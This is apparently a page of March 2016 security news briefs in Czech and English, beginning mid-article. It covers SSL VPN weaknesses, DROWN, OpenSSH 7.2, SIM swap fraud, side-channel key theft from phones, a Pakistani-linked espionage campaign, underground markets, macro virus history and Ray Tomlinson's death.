77 % z nich používá SSLv3 protokol, zhruba stovka dokonce SSLv2. Oba tyto protokoly jsou nejenom zastaralé, ale hlavně mohou být zneužité řadou zranitelností a útoků. Ani jeden není považován za bezpečný.

76 % používá nedůvěryhodné SSL certifikáty, což je vystavuje riziku MITM (Man in the middle) útoku. Což v praxi může znamenat, že s pomocí falešného serveru se hackeři mohou dostat ke všemu, co posíláte.

74 % má certifikáty s nebezpečným SHA-1 podpisem, 5 % dokonce používá ještě starší MD5 technologie.

41 % používá nebezpečné 1024 bitové klíče pro RSA certifikáty. Obecně se předpokládá, že cokoliv pod 2048 bitů délky není bezpečné.

10 % SSL VPN serverů je založeno na Open SSL a zároveň stále napadnutelné nyní již hodně starým Heartbleed útokem (zranitelnost objevená v dubnu 2014).

Pouze 3 % vyhovují PCI DSS požadavkům a žádné SSL VPN nevyhovují NIST pravidlům.

Podrobnější informace najdete v 90% of SSL VPNs use insecure or outdated encryption, putting your data at risk, tedy přímo u autorů studie (testu), společnosti High-Tech Bridge.


RIP Ray Tomlinson, The Creator of Email, Dies at 74
7.3.2016 IT
A computing legend who 'changed the way the world communicates' has died.
RAY TOMLINSON, the man who invented email as we know it today and picked the @ symbol for email addresses, passed away at the age of 75 following an apparent heart attack Saturday morning, according to reports.
Hard to believe but 'the godfather of email' has passed away.
His death was confirmed by Mike Doble, director of corporate PR at Tomlinson's employer Raytheon.
"A true technology pioneer, Ray was the man who brought us the email in the early days of networked computers," Doble said in a statement confirming Tomlinson's death.
The Internet reacted with sadness over the death of Tomlinson, who became a legend for his invention in 1971 of a system that allowed a user on one network to send a message to other computer users on other networks.
"Thank you, Ray Tomlinson, for inventing email and putting the @ sign on the map. #RIP," Gmail tweeted yesterday.
Tomlinson Introduced @ in Email Address
At the time of his invention, Tomlinson was working on ARPANET – predecessor of the modern Internet – at research and design company Bolt Beranek and Newman (now BBN Technologies).
Tomlinson used @ symbol in the email address in order to separate the username from the host name.
By the 1990s email had become a pillar of the Internet and Tomlinson was inducted into the Internet Hall of Fame in 2012, though he could not say what the very first email sent back in 1971 actually said.
Tomlinson said in an interview with the New York Times in 2009 that the email was just random strings of text, saying:
"I sent a number of test messages to myself from one machine to the other. The test messages were entirely forgettable and, therefore, forgotten."
Thanks to Tomlinson's invention that powers over a Billion and a half users communicating across the traditional barriers of time and space. #RIPRayTomlinson


Operation Transparent Tribe targets Indian diplomats and military
7.3.2016 Safety

ProofPoint uncovered a new cyber espionage campaign dubbed Operation Transparent Tribe targeting Indian diplomatic and military entities.
A new cyber espionage campaign dubbed Operation Transparent Tribe is targeting diplomats and military personnel in India. The researchers at Proofpoint who have uncovered the hacking campaign confirmed that threat actors used a number of hacking techniques to hit the victims, including phishing and watering hole attacks, and drop a Remote Access Trojan (RAT) dubbed MSIL/Crimson.

The MSIL/Crimson RAT used in the cyber espionage operation implements a variety of data exfiltration functions, including the ability to control the laptop cameras, take screen captures and keylogging.

The researchers discovered the campaign on February 11, 2016, when they noticed two live attacks against Indian diplomats operating in embassies in Saudi Arabia and Kazakhstan.

Proofpoint discovered that IP addresses involved in the attacks are in Pakistan, the attacks appear sophisticated and are part of a wider operation that relies on a network of watering hole websites and multiple phishing email campaigns.

The nature of the target and the methods used by attackers suggest the involvement of a nation-state attacker as explained by Kevin Epstein, VP of threat operations center at Proofpoint.

“This is a multi-year and multi-vector campaign clearly tied to state-sponsored espionage,” Epstein told to ThreatPost. “In the world of crimeware, you rarely see this type of complexity. A nation-state using multiple vectors, that’s significant.”

State-sponsored hacking is becoming a privileged option for governments that target other states mainly for cyber espionage with the intent of gathering intelligence on political issues.

Operation Transparent Tribe 2

The campaign discovered by ProofPoint required a significant effort of the APT group that set up multiple websites used to serve the MSIL/Crimson RAT.

In one case, the ATP behind the Operation Transparent Tribe used malicious email to spread weaponized RTF documents exploiting the CVE-2012-0158 Microsoft ActiveX vulnerability that dropped the malware on the target’s machine.

MSIL/Crimson is a multi-stage malware, after infected the machine in the first stage, it downloads more fully featured remote access Trojan component.

The attackers also used rogue blogs news websites with an Indian emphasis to serve the dangerous RAT.

Operation Transparent Tribe

Enjoy the Operation Transparent Tribe report.


Which are principal cybercriminal ecosystems in the Deep Web?
7.3.2016 Crime

TrendMicro published an interesting analysis of the principal cyber criminal underground communities in the Deep Web worldwide.
A new interesting report published by the experts at TrendMicro highlights the differences between the principal underground ecosystems worldwide.

Thinking of a unique “global” underground ecosystem is an error, every community has its own characteristics, the criminal crews that compose it are specialized in the provisioning of specific product and services.

The researchers who analyzed illegal activities in the Deep Web have identified at least six different cybercriminal ecosystems operating in Russia, Japan, China, Germany, in the United States and Canada (North America), and Brazil.

criminal underground markets Deep Web

“Each country’s market is as distinct as its culture. The Russian underground, for instance, can be likened to a well-functioning assembly line where each player has a role to play. It acts as the German market’s “big brother” as well in that it greatly influences how the latter works. The Chinese market, meanwhile, boasts of robust tool and hardware development, acting as a prototype hub for cybercriminal wannabes. Brazil is more focused on banking Trojans while Japan tends to be deliberately exclusive to members.” states the report.

The last report published by TrendMicro explains the differences, revealing the peculiarity of the offer in each ecosystem.

“Cybercriminals from every corner of the world take advantage of the anonymity of the Web, particularly the Deep Web, to hide from the authorities. Infrastructure and skill differences affect how far into the Deep Web each underground market has gone. Chinese cybercriminals, for instance, do not rely on the Deep Web as much as their German and North American counterparts do. This could, however, be due to the fact that the “great firewall” of China prevents its citizens (even the tech-savviest of its cybercrooks) from accessing the Deep Web. The fact that Germany and North America more strictly implement cybercrime laws may have something to do with their greater reliance on the Deep Web, too.”

The Russian underground is defined “a well-functioning assembly line,” it is an ecosystem crowded by professional sellers that competing each other by providing goods in the shortest amount of time and most efficient manner possible. Marketplaces like fe-ccshop.su and Rescator that offer products and services for credit card frauds are very popular in the criminal underground worldwide.

These markets offer escrowing services or “garants,” that make them an important aggregator for the criminal demand, offering them a privileged environment where operate anonymously.

The Japanese underground is characterized by members only bulletin board systems, the criminals make large use of special jargon to evade the authorities. This market is characterized by the attitude in accepting more unusual kinds of payment, including gift cards and forum points instead of bitcoins or cash paid via money transfer.

The Chinese underground is focused on the provisioning of hardware several illegal activities rapidly responding to the cybercriminal demand.

“The Chinese underground is a teeming hub of prototypes. It not only sells the usual array of software and services found in its counterparts, but also hardware. It adapts the fastest to the latest in cybercrime trends and leads the way in terms of cybercriminal innovation. And true to its adaptive nature, it now boasts of uncommon offerings like leaked-data search engine privacy protection services that can only be dubbed “made in China.” states the report.

The North American underground is considered the most open to novices, it is visible to both cybercriminals and law enforcement, meanwhile the Canadian underground is focused on the sale of fake/stolen documents and credentials (fake driver’s licenses and passports, stolen credit card and other banking information, and credit “fullz” or complete dumps of personal information).

Germany’s underground is a subsidiary of the Russian one, the market heavy rely on DarkNets, the most popular forums use mirrors on the Tor Network. Deep Web.

Let’s close with the Brazilian underground, which is characterized by the presence of youngsters with no regard for the law. They use the Surface Web, exploiting popular social media for their activities.

The key findings of the study highlights:

The Japanese underground is the only market that does not focus on traditional crimeware. This underground scene caters more to the taboo.
The German underground takes cues from the Russian market.
The Chinese underground serves as a hotbed for crimeware (particularly hardware) prototypes.
For more details on the criminal ecosystem in the Deep Web give a look to the report “Cybercrime and the Deep Web”


Nebezpečná chyba ohrožuje třetinu internetu. Uživatelé se bránit nemohou

6.3.2016 Zranitelnosti
Bezpečnostní experti odhalili novou nebezpečnou trhlinu zvanou DROWN, která může být zneužita k napadení šifrované komunikace na webu. Kyberzločinci tak mohou snadno odposlouchávat přístupové údaje včetně hesel, nebo například čísla kreditních karet i s ověřovacími prvky. Zranitelnost se týká třetiny internetu, uvedl Národní bezpečnostní tým CSIRT.CZ.
Hlavní problém je v tom, že uživatel se před chybou nemůže nijak bránit. Zatímco před nejrůznějšími viry a trojskými koni jej dokážou ochránit antivirové programy, na zranitelnost DROWN jsou bezpečnostní aplikace krátké.

Chyba se totiž týká šifrované komunikace, konkrétně staršího protokolu SSLv2. Právě kvůli tomu mohou zranitelnost opravit pouze provozovatelé serverů, nikoliv samotní uživatelé. Při návštěvě zranitelných stránek tak uživatelé nemusejí ani vědět, že je něco v nepořádku.

V ohrožení e-mailová komunikace i bankovnictví
„Zranitelné mohou být webové stránky, mailové servery a jiné služby, které protokol TLS využívají,“ konstatoval Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Ten zároveň detailně popsal, jak může být chyba zneužita: „K využití DROWN zranitelnosti může dojít v případě, že služba umožňuje využívaní SSLv2 a TLS zároveň nebo je soukromý klíč využíván ještě na jiném serveru, který podporuje SSLv2. Výsledkem úspěšného zneužití zranitelnosti může být prolomení TLS komunikace mezi serverem a uživatelem.“

Co to znamená pro uživatele v praxi? I když se pohybují na zabezpečených stránkách, například v e-mailové schránce nebo v internetovém bankovnictví, neznamená to, že je jejich komunikace skutečně bezpečná.

Komunikace může být odposlouchávána
Pokud se přihlašují na server, který obsahuje chybu, může být komunikace odposlouchávána. Když tedy zadají na počítači například přihlašovací údaje k internetovému bankovnictví, kyberzločinci se k nim mohou dostat díky chybě DROWN v podstatě ještě dříve, než dorazí na samotný server.

Trhlinu přitom obsahuje nezanedbatelná část webů po celém světě. „Podle předběžných odhadů je zranitelných až 33 % stránek využívajících HTTPS protokol,“ doplnil Bašta.

Jakých konkrétních webů se zranitelnost DROWN týká, však neuvedl. Je nicméně více než pravděpodobné, že jen v České republice budou tisíce serverů obsahujících chybu.

Otázka je, jak rychle dokážou poskytovatelé jednotlivých služeb zareagovat a své systémy skutečně opravit. Bezpečnostní experti o tom vědí své, i přes závažnost Chyby krvácejícího srdce příslušnou záplatu nenainstalovala ani rok po objevení více než polovina firem po celém světě.

Kvůli Chybě krvácejícího srdce mohli útočníci disponovat například přihlašovacími uživatelskými údaji, a to včetně soukromých hesel k e-mailům, sociálním sítím, on-line bankovnictví nebo nejrůznějším internetovým obchodům. Vzhledem k tomu, že řada účtů je navázána na platební karty, byla hrozba nebezpečí o to závažnější.

Mezi postiženými byly i velké portály, jako jsou například Yahoo.com, Flickr.com či Mail.com. I proto se podle BBC jednalo o jednu z nejzávažnějších bezpečnostních trhlin v historii internetu. Chyba, která by v takovém rozsahu vystavila internet potenciálním útokům, se totiž zatím nikdy neobjevila.


SIM swap fraud cases force bank to improve security
6.3.2016 Mobil

Two major high street banks will change security procedures after journalists demonstrated how to carry out SIM swap fraud attacks.
The BBC reported that two major high street banks will adopt new security measures to protect their customers. The decision to modify the security procedures follows the scoop made by two journalists from BBC Radio 4’s You and Yours programme that broke into an account online and removed money.

Cybercriminals are increasingly targeting bank customers with different techniques, one of them is known as ‘SIM swap fraud.’

A SIM swap fraud is a type of fraud that overwhelms the additional security measures introduced by banks to protect customer transactions. Basically cyber criminals are able to transfer cash from a victim’s account by accessing one-time pin codes and SMS notifications.

Criminal organizations obtain a customer’s bank details by launching a phishing campaign, or by purchasing them in the underground market.

At this point, the criminals open a parallel business account with the same victim’s bank, in the customer’s name. This is possible because the procedure involves fewer security checks when the victim is already a customer.

The criminals use answers to security questions obtained from the analysis of the victim’s social media accounts, to contact the victim’s mobile phone provider, posing as the customer, to report that their mobile device is lost or damaged.

They demonstrate their identity, answering basic security questions, this causes the cancellation of the old SIM and the activation of new one. From then the criminals can operate with the victim’s mobile account, intercepting or initiating calls, texts and authorizations that could allow them to transfer cash.

The cybercriminals can also request that security settings are changed to lock out the victim from the account.

Recently bank customers’ accounts have been successfully hacked with the SIM swap fraud technique, several victims reported the crimes to the You and Yours programme.

“You and Yours has been contacted by dozens of people affected by the scam. All say they have never revealed their security details to anyone, and the that first they knew something was wrong was their mobile phone going dead.” reported the BBC.

You and Yours producer Natalie Ms Donovan is a customer of the NatWest and decided to investigate on the SIM swap fraud cases.

SIM swap fraud natwest bank

She used her bank account as an experiment and her colleague Shari Vahl was able to break into her account without having specific information such as the banking customer number, PIN or any passwords.

“I did not know her mother’s maiden name, her pet’s name or her first school, and yet I was still able to change her PIN and password to lock her out of her own account.” continues Shari Vahl

In the experiment, the attacker only transferred £1.50 to his bank account by controlling the of Natalie Donovan ‘s mobile phone.

The journalists reported the issue to the NatWest, owned by Royal Bank of Scotland. Representatives from the Royal Bank of Scotland confirmed that that the systems for both banks would be changed as a direct result of the You and Yours investigation.

“This is a cross-industry problem, particularly with us, and the telecom companies. We working with Financial Fraud Action UK to make sure we’re communicating with each other … to make sure mobile phone security is as strong as it possibly can be.” said Chris Popple, managing director of NatWest Digital.


Detekce důmyslných útoků pomocí analýzy chování

6.3.2016 Zabezpečení
Big data a strojové učení pomáhají téměř v reálném čase posoudit riziko aktivit uživatelů, zda ještě vyhovují normě či naopak už jsou tzv. za hranou.

Zaměstnanec denně používá během pracovní doby legitimní oprávnění pro přístup k podnikovým systémům z podnikového pracoviště. Systém zůstává v bezpečí. Najednou však dojde po půlnoci k použití stejných oprávnění pro přístup k databázovému serveru a spustí se dotazy, které uživatel nikdy předtím nezadával. Je systém stále v bezpečí?

Možná je. Správci databáze musejí koneckonců dělat údržbu a údržba se obvykle činí po pracovní době – některé operace údržby vyžadují vykonání nových dotazů. Ale možná také není. Mohlo dojít k vyzrazení přihlašovacích údajů uživatele a právě může probíhat pokus o ukradení dat.

Konvenční bezpečnostní kontroly na takovou situaci neposkytnou jednoznačnou odpověď. Statická obrana perimetru již nestačí pro svět, ve kterém se krádeže dat stále častěji vykonávají prostřednictvím ukradených přihlašovacích údajů uživatelů.

Tyto případy však nelze srovnávat se zločinnými zaměstnanci, kteří zneužijí své přihlašovací údaje. Také současná prostředí BYOD mohou zcela zničit statický perimetr, jak dochází k neustálému přidávání nových pravidel pro externí přístup.

Jedním z inovativních přístupů se označuje jako analýza chování uživatelů (UBA, User Behavior Analytics). Dokáže tuto hádanku řešit pomocí analýz big dat a algoritmů strojového učení, které téměř v reálném čase posuzují riziko aktivit uživatelů.

Co umí UBA?

UBA využívá modelování k popisu normálního chování. Toto modelování zahrnuje informace o uživatelských rolích a funkcích z aplikací personálního oddělení a z adresářů včetně přístupu, účtů a oprávnění, aktivity a geografické lokalizační údaje shromážděné ze síťové infrastruktury, upozornění od obranných bezpečnostních řešení atd.

U těchto dat se vyhodnocují souvislosti a analyzují se na základě předchozích a současných aktivit. Tyto analýzy zohledňují mimo jiné také typy transakcí, využívané zdroje, trvání relací, konektivitu a obvyklé chování jedinců ze stejné skupiny.

UBA zjišťuje, co je ještě normální chování a co už jsou nezvyklé aktivity. Jestliže původně anomální chování jedné osoby (například půlnoční databázové dotazy) následně začnou vykonávat i další jedinci z téže skupiny, přestane se to považovat za střední či vysoké riziko.

Dále UBA vykonává modelování rizik. Anomální chování se automaticky nepovažuje za riziko. Musí se nejprve vyhodnotit z perspektivy potenciálního dopadu.

Pokud anomální činnost zahrnuje zdroje, které nejsou citlivé, jako jsou například informace o využití konferenční místnosti, je potenciální dopad nízký. Naopak pokusy o přístup k citlivým souborům, jako je například duševní vlastnictví organizace, však dostávají mnohem vyšší hodnocení.

Následně se riziko pro systém, tvořené určitou transakcí, definuje pomocí vzorce Riziko = Pravděpodobnost x Dopad.

Pravděpodobnost ve vzorci souvisí s pravděpodobností, že je dotyčné chování uživatele anomální. Zjišťuje se s využitím algoritmů pro modelování chování. Dopad se odvodí z úrovně důvěrnosti a důležitosti informace, se kterou se pracuje, a z kontroly, jež se používá pro práci s těmito údaji.

Transakce a jejich vypočítaná rizika se poté mohou spojit s konkrétním uživatelem, který tyto transakce vykonává, a výsledně se určí úroveň rizika.

Výpočet uživatelského rizika obvykle zahrnuje další faktory, jako jsou stupeň důvěrnosti aktiv, oprávnění, potenciální zranitelnosti, zásady atd. Jakékoli zvýšení těchto faktorů zvýší skóre rizika tohoto uživatele.

Všechny faktory v těchto výpočtech mohou ale mít své vlastní váhové hodnoty pro automatické vyladění celkového modelu.

Nakonec UBA sbírá, koreluje a analyzuje stovky atributů včetně situačních informací a informací o hrozbách od třetích stran. Výsledkem je bohatá množina dat s velikostí v řádu petabajtů, která zohledňuje kontext.

Podpora strojového učení

Algoritmy strojového učení UBA mohou nejen odfiltrovat a eliminovat falešné poplachy a vytvořit inteligenci pro riziko, kterou lze využít pro rozhodování, ale mohou také na základě shromažďovaných informací revidovat normy, předpovědi a celkové procesy hodnocení rizik...


New exploit steals secret cryptographic keys from mobile devices

5.3.2016 Mobil

A group of security researchers has devised a new attack scheme to steal cryptographic keys from both Android and iOS devices.
A team of security researchers from Tel Aviv University, Technion and The University of Adelaide has elaborated a new attack scheme to steal cryptographic keys from both Android and iOS devices.

Last month, the same team has demonstrated hot to steal sensitive information from targeted air-gapped systems, in June 2015, the group demonstrated that encryption keys can accidentally leak from a PC via radio waves by using a cheap consumer-grade kit.

This new attack allows the researchers to steal any kind of cryptographic keys including Bitcoin wallets and Apple Pay accounts.

“An attacker can non-invasively measure these physical effects using a $2 magnetic probe held in proximity to the device, or an improvised USB adapter connected to the phone’s USB cable, and a USB sound card. Using such measurements, we were able to fully extract secret signing keys from OpenSSL and CoreBitcoin running on iOS devices.” states a blog post published by the experts. “We also showed partial key leakage from OpenSSL running on Android and from iOS’s CommonCrypto.”

The researchers explained that their hacking technique is a non-invasive Side-Channel Attack. The attackers are able to extract the crypto key from a targeted device by analyzing the pattern of memory utilization or the electromagnetic outputs that are emitted during the decryption process.

The exploit devised by the researchers works against the Elliptic Curve Digital Signature Algorithm (ECDSA) used in the majority of applications based on cryptographic algorithms, including Bitcoin wallets and Apple Pay.
The researchers used a $2 magnetic probe placed near an iPhone 4 while the mobile devices were performing cryptographic operations in order to measure enough electromagnetic emanations and extract the secret cryptographic keys used by many different applications.

Another possible attack scenario sees a home-made USB pass-through adapter connected to the USB cable of the smartphone and a USB sound card to capture the signal.

Obviously, the attacker needs a physical access to the device to place a probe or cable in proximity, the attack also needs the targeted device will perform enough crypto operations to measure a few thousand of ECDSA signatures.

steal cryptographic keys from mobile
The team also successfully tested the attack on a Sony-Ericsson Xperia X10 Phone running Android.

“OpenSSL’s ECDSA running on Android phones is also vulnerable to our attacks. For example, here is a Sony Xperia 10s being measured, with our lab-grade measurement equipment:”

steal cryptographic keys from mobile 2

The group of researchers also cited a study conducted by another team of security experts that devised a similar Side-Channel attack exploiting a flaw in the Android version of the BouncyCastle crypto library. In this attack scenario, an attacker could analyze electromagnetic emissions to extract cryptographic keys.

All the iOS versions from 7.1.2 to 8.3 are vulnerable to the side-channel attack, only exception is the last iOS 9.x version that implements security countermeasures against side-channel attacks.

The experts highlighted that hackers can exploit vulnerabilities affecting mobile applications running on mobile devices. The researchers demonstrated how to hack the iOS app CoreBitcoin that is used to protect Bitcoin wallets on Apple mobile devices.

If you want more details give a look to the paper published by the researchers.


OpenSSH 7.2: SHA-2 a chytřejší ssh-agent
5.3.2016
Zabezpečení
Po několika rychle vydaných verzích OpenSSH, opravujících několik závažných bezpečnostních chyb, přichází opět verze s novými funkcemi.
Facebook Twitter Google+ Líbí se vám článek?
Podpořte redakci
8 NÁZORŮ
Bezpečnost (nejen posledních verzí)

Poslední verze, která přišla s novými funkcemi a prošla řádným testováním, byla verze 6.9. Následující verze 7.0p1 přinesla několik nových funkcí, ale hlavně opravovala čtyři závažné bezpečnostní chyby, primárně související s integrací PAM (CVE-2015–6563, CVE-2015–6564), špatným nastavením přístupu k TTY na serveru (CVE-2015–6565) a možností překročit povolený počet pokusů o zadání hesla při využití ChallengeResponseAuthentication (CVE-2015–5600).

Následující verze 7.1p1 vyšla deset dní po verzi 7.0 a opravovala logickou chybu ve vyhodnocování nastavení PermitRootLogin without-password, která mohla nastat v závislosti na nastavení v čase kompilace.

Roaming
Další verze, 7.1p2, přišla v polovině ledna a zakazovala funkci Roaming, která byla ve výchozím nastavení povolená a zneužitelná ze strany modifikovaného serveru (CVE-2016–0777, CVE-2016–0778, CVE-2016–1907). V posledních verzích již existovaly různé obranné mechanismy zabraňující úspěšnému zneužití, ale tato funkce existovala od verze 5.4, tedy více než 6 let a při určitých okolnostech mohla vést k odeslání části paměti s privátním klíčem zákeřnému serveru.

Aktuální verze tedy odebírá celý kód související s funkcí Roaming, který nikdy nebyl pořádně zdokumentovaný, otestovaný a mohl by být zdrojem dalších problémů. Výchozí konfigurace nově nastavuje sandbox před-autentizačního procesu (na Linuxu je dnes většinou použitý seccomp, na OpenBSD pledge) minimalizující jeho privilegia.

X11 a staré algoritmy
Nová verze opravuje další problém spojený s tunelováním X11 protokolu na dnešních systémech bez rozšíření XSECURITY, kdy výchozím chováním bylo tiché ignorování selhání požadavku na Untrusted spojení a použití neomezeného.

Aktuální verze posouvá minimální velikost akceptovaných prvočísel pro výměnu klíčů pomocí DH na 2048 bitů, která je zatím za hranicí potenciálního prolomení (Logjam).

Dále je ve výchozím nastavení klienta zakázána většina historických algoritmů ( blowfish-cbc, cast128-cbc, arcfour-*, ...) na straně klienta. Ty byly již dříve odebrány z výchozí serverové konfigurace. Stejně tak jsou nově zakázány HMAC algoritmy používající ořezané/zkrácené MD5.

Nové funkce

SHA-2
První novinkou, které se můžeme dočkat, je možnost použití SHA-2 256 a SHA-2 512 při autentizace privátním RSA nebo DSA klíčem. V původním protokolu SSH2 (rfc4253) je pevně určen hashovací algoritmus SHA-1, který již není doporučovaný. Proto došlo k rozšíření protokolu (zatím k dispozici jako návrhy, pod hlavičkou Bitvise – komerční SSH server a klient pro Windows) o tyto nové algoritmy pro podpis, o standardní možnost tyto algoritmy oznamovat druhé straně a následně používat. Pro uživatele se v tomto směru nic nemění, ale jedná se o další krok k větší flexibilitě, robustnosti a vyšší bezpečnosti samotného protokolu.

Inteligentní ssh-agent
Další užitečnou funkcí je změna procesu, jakým je možné používat ssh-agent. Dosud bylo potřeba před použitím klíče z ssh, ručně přidat klíče do agenta a klíč „odemknout“. Nyní je možnost přidávat klíče „za běhu“, v tu chvíli kdy klíč poprvé použijeme. To umožňuje omezit počet odemčených klíčů při startu systému na minimum a s vhodným nastavením životnosti klíčů v agentovi (přepínač -t), je můžeme také automaticky „zamykat“. Tato funkce je ve výchozím nastavení vypnutá, ale věřím, že si brzo najde své uživatele, až většina distribucí aktualizuje.

Příklad chování:

[me@f24 ~]$ ssh-copy-id -f -i ./rsa.pub test@f24
test@f24's password:
[me@f24 ~]$ ssh-add -l
The agent has no identities.
[me@f24 ~]$ ssh -i ./rsa -oAddKeysToAgent=yes test@f24
Enter passphrase for key './rsa':
[test@f24 ~]$ logout
Connection to localhost closed.
[me@f24 ~]$ ssh -i ./rsa -oAddKeysToAgent=yes test@f24
[test@f24 ~]$
Kromě striktních možností, které zakazují nebo povolují tuto funkci, existuje také možnost „ask“, která se před přidáním klíče zeptá pomocí dialogu ssh-askpass.

Omezení klíčů na serveru
K dalšímu zjednodušení došlo na straně serveru v možnosti přidávat omezení jednotlivým klíčům. Tato funkce je většinou použita pro skripty provádějící vzdáleně jeden určitý úkol. Dosud bylo potřeba přidávat dlouhý seznam privilegií ( no-pty,no-port-forwarding,no-agent-forwarding,no-X11-forwarding,...), kterými chceme připojujícího se uživatele omezit. Nyní je možné použít klíčové slovo restrict, které nahrazuje všechna zákazová klíčová slova, včetně těch v budoucnosti přidaných, a pokud chceme některou akci povolit, je to možné pomocí explicitního whitelistu ( restrict,pty,port-forwarding,...).

Další rozšíření dostaly také nástroje ssh-keygen a ssh-keyscan, hlavně v souvislostí se zpracováním certifikátů a otisků klíčů.

Opravy chyb

Proběhla aktualizace nástroje ssh-copy-id, který obsahoval v posledních verzích několik problémů. Možnost obměny klíčů sezení (rekey) se dočkala revize pro velké množství přenesených dat, které bylo problémové.

SFTP server vyžaduje rozšířený glob(), jehož struktury nejsou binárně kompatibilní s verzí poskytovanou Linuxem. Tato funkce a její struktury byly přejmenovány jako příprava pro podporu klíčového slovaInclude v rámci konfiguračních souborů.

Více informací naleznete v oficiálním oznámení. Pokud si chcete nové funkce OpenSSH vyzkoušet, balíčky pro aktuální Fedoru jsou již k dispozici.


Historie hackingu: Vývoj virů v dokumentech

5.3.2016 Hacking
Dlouhé roky to byla nezpochybnitelná pravda informační bezpečnosti: dokumenty nemohou obsahovat viry, zavirovat lze pouze spustitelné soubory (maximálně boot sektory disket a disků). Historie nám ovšem už mnohokrát ukázala, že věčné pravdy jen málokdy platí věčně, a v počítačové bezpečnosti zvláště.

Dlouhé roky se viry dokumentům vyhýbaly. Prostě proto, že je nešlo kam vložit: ať se autor snažil sebevíc, nikdy spustitelný kód nedostal příležitost.

Dnes s odstupem času a o desítky let zkušeností (inu, po bitvě je každý generál) můžeme říci, že jsme měli spíše štěstí: nějaká bezpečnostní chyba umožňující spuštění kódu „propašovaného“ do dokumentu by se tehdy už bezesporu našla, zvláště v době, kdy byla bezpečnost přehlíženou Popelkou. Leč nikdo se o nic podobného nepokoušel.

Pokud si odmyslíme možnost bezpečnostní chyby, pak lze konstatovat, že dokumenty škodlivé kódy obsahovat nemohou. Dokument je totiž soubor, který skutečný program (grafický či textový editor apod.) pouze zobrazí, ale nevykoná jej. Jinými slovy – kniha s návodem na výbušninu vám z principu věci v ruce také neexploduje.

MS Office mění hru

Jenže co je jednoduché v reálném světě, bývá v kyberprostoru zpravidla jinak. Stačí se podívat do osudového roku 1995, kdy na svět přišly Windows 95. A s nimi i kancelářský balík Office s netušenými možnostmi a vlastnostmi.

Jednou z nich byla i schopnost vkládat do dokumentů makra. Záměrem tvůrců bylo zjednodušit uživatelům dělání nudných, složitých nebo opakujících se operací: ty bylo možné nahradit vložením skriptu, který za ně vše vykonal.

Tvůrci konceptu ovšem dali makrům do vínku velmi silný jazyk: Visual Basic, což znamenalo, že makra mohla téměř cokoliv včetně formátování disku nebo rozesílání e-mailů.

První demonstrační makrovirus tohoto typu přišel v prosinci 1994 a měl název DMV (Document Macro Virus). Přesněji šlo o dva různé makroviry: jeden pro Word, druhý pro Excel. Šlo jen o ukázkové kódy, které měly sloužit coby varování.

V srpnu 1995 (ve stejném měsíci, kdy se začaly prodávat Windows 95) pak přišel skutečný makrovirus. Jmenoval se Concept a nad jeho původem se dodnes vznáší celá řada otazníků.

Jeho autor měl totiž výtečnou znalost prostředí maker: takovou, jakou nelze dosáhnout ani velmi důkladným studiem. Dodnes se spekuluje (ověřit to pochopitelně nelze), že Concept vytvořil některý ze zaměstnanců Microsoftu, který se na vývoji koncepce přímo podílel.

Concept se každopádně stal jedním z historicky nejrozšířenějších virů. Důvod je jednoduchý: na příchod makrovirů nebyli připraveni uživatelé ani antivirová ochrana. Ti prvně jmenovaní roky poslouchali, že dokumenty prostě nemohou obsahovat viry. Ti druzí pak na tomto předpokladu postavili své algoritmy.

Vše ale bylo třeba změnit a nebylo to vůbec jednoduché. Antivirové firmy například opakovaně (a také marně) žádaly Microsoft o zveřejnění některých funkcí či parametrů, které by jim umožnily efektivně makroviry potírat. Asi nikoho tak nepřekvapí, že podíl makrovirů na celkovém počtu škodlivých kódů skočil během jediného roku z nuly na devadesát procent.

České kotliny se tenkrát tento problém příliš netýkal, protože při překládání kancelářského balíku do češtiny si někdo dal práci a přeložil nejen hlášky, ale i vnitřní strukturu.

Makroviry psané pro anglické prostředí tak v Česku neměly šanci. Když například hledaly instrukci „Open“, nepochodily. Protože v tuzemské struktuře byl příkaz „Otevřít“.

Lotus 123 a JPG

Ale abychom nenasazovali psí hlavu jen systému Windows: makra v dokumentech existovala již dříve. Demonstrativně bylo prokázané, že pro prostředí Lotus 123 bylo možné vytvářet sebereplikační makra. Teoreticky dokonce již od roku 1989, kdy byla tato funkce do prostředí implementována.

Prakticky se ale viry v Lotusu 123 nikdy nestaly problémem. A to díky tomu, že tam implementovaný jazyk byl velmi slabý. A také třeba i proto, že aktivace makra nebyla vůbec jednoduchá a zvládl ji jen zkušený uživatel. Hypotetický makrovirus by tak vyžadoval opravdu významnou pomoc.

Pandořina skříňka se každopádně otevřela. Programátoři objevili sílu maker, takže je začali přidávat do všech možných i nemožných aplikací. Světem se tak začaly šířit makroviry pro Corel (GaLaDRieL) nebo AutoCad (ACAD.Star).

Skutečně značné nebezpečí ale představoval až škodlivý kód Perrun, jenž se objevil v roce 2002 a který byl schopný infikovat formát obrázků JPG.

Řešil to sice jistou obezličkou (do formátu JPG přidával spustitelný kód a pomocí zvláštního EXE souboru s odkazem v registrech se na něm odkazoval), ale zbořil další dogma.

Pak se objevilo ještě několik škodlivých kódů, které byly schopné JPG infikovat (například modifikací metadat), ale naštěstí se příliš neprosadily.

Důvod byl prozaický: ve stejné době vrcholila „zlatá éra e-mailových červů“. Tyto kódy byly mnohem rychlejší, cílenější a pro útočníky pohodlnější, takže tvorba nějakých virů v dokumentech hackery příliš nezajímala.

Což je možná dobře, protože kdyby se škodlivé kódy v obrázcích významně rozšířily, kybernetický svět by zřejmě dnes vypadal krapet jinak.

Návrat krále?

Po určitém útlumu každopádně viry v dokumentech zažily svůj návrat. Nejprve se jim podařilo dobýt PDF formát (před deseti lety byla významná část dokumentů v tomto formátu na webu nějakým způsobem infikovaná, důvodem byla absence záplatovacího mechanismu na straně výrobce programu).

A dnes se hojně využívají k cílovým útokům třeba v případě průmyslové špionáže.


How to Steal Secret Encryption Keys from Android and iOS SmartPhones
4.3.2016 Android  iOS
Unlike desktops, your mobile devices carry all sorts of information from your personal emails to your sensitive financial details. And due to this, the hackers have shifted their interest to the mobile platform.
Every week new exploits are discovered for iOS and Android platform, most of the times separately, but the recently discovered exploit targets both Android as well as iOS devices.
A team of security researchers from Tel Aviv University, Technion and The University of Adelaide has devised an attack to steal cryptographic keys used to protect Bitcoin wallets, Apple Pay accounts, and other highly sensitive services from Android and iOS devices.
The team is the same group of researchers who had experimented a number of different hacks to extract data from computers. Last month, the team demonstrated how to steal sensitive data from a target air-gapped computer located in another room.
Past years, the team also demonstrated how to extract secret decryption keys from computers using just a radio receiver and a piece of pita bread, and how to extract the cryptographic key just by solely touching the chassis of the computer.
